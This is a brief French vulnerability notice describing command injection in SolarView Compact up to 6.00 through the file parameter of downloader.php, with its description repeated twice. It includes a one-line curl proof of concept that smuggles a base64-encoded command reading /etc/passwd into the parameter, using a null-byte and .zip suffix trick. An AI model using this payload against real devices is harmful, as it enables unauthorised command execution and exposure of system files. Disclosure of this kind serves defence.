
Une vulnérabilité d'injection de commande existe dans SolarView Compact jusqu'à la version 6.00 ; les attaquants peuvent exécuter des commandes en contournant les restrictions internes via downloader.php.
Il existe une vulnérabilité d'injection de commandes dans SolarView Compact jusqu'à la version 6.00 ; les attaquants peuvent exécuter des commandes en contournant les restrictions internes via downloader.php.
curl http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0
Des commandes peuvent être injectées en contournant les restrictions internes par l'accès au paramètre file de la page downloader.php.
